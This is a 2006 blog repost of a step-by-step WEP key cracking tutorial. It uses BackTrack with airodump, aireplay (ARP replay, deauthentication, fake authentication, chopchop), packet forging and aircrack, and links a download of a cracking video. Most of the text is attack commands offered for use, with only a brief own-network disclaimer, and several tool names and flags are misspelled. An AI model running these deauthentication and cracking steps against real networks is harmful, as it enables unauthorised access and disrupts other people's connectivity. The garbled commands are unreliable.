Hacking - Wep Cracking - Ultimate Guide (Video)

7 08 2006

I just cut and pasted the whole article. Namely because this is a great guide. I have seen many many
screenrecord guides and a whoel video on the subject, but the hard text is way more helpful. BTW -
Backtrack has its final release out now. It so totally rocks.

Cracking WEP: The ultimate guide

[ via profit42 ]

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to
start the gui: type in startx on the command lien after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up
(mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng –ivs -w capture [wireless interface]

5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s
mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop
airodump from running before you have the wep key!

##### Generating data, method one: There are clients visible in airodump associated to the network
#####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the
BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]

3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you
have around 500k of data, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the
network #####

1. Open a new terminal window and type in (do NOT press the enter button!)

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the
BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button!):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID
you found wth airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible
in the arpreplay window.

3. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06

4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you
have around 500k of data, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID
you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the
BSSID you found wth airodump] -h 01:02:03:04:05:06

3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a
few seconds/minutes and remember the filename that is given to you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open
the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)

5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those
addresses down somewhere.

6. open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth
airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap

7. In a new or in the same terinal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you
have around 500k of data, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)

or

airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)

If you don’t know how strong the encryption is, type in both in different terminals and start a third
terminal. Type in this code:

airecrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep
airodump running!
DISLAIMER:I don’t think I have to mention that you need written permission from the owner of the
network before you are allowed to start cracking his wep or even before you are allowed to capture
packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with
another network than your own.

I’ve done it to my own WiFi at home and the simplicity of it is mind boggling. My philosophy is that
the more people have out there that shows the lask of security, the more the security ware people will
actually make there apps/hardware/code secure.

This text “how to” may be a bit confusing because you can’t see the command line, for us visual
learners that is a bit of a handicap. So I hunted around for the old whoppix wep cracking AVI. Every
link I could find that took me to a direct view of the video (originally presented in flash) was dead so I
found a place to DL the actualy file. I wanted to preseve the best quality so I just posted it for
download. Click the link below to DL the ORIGINAL video file from rapidshare. (BTW - its around
50mb)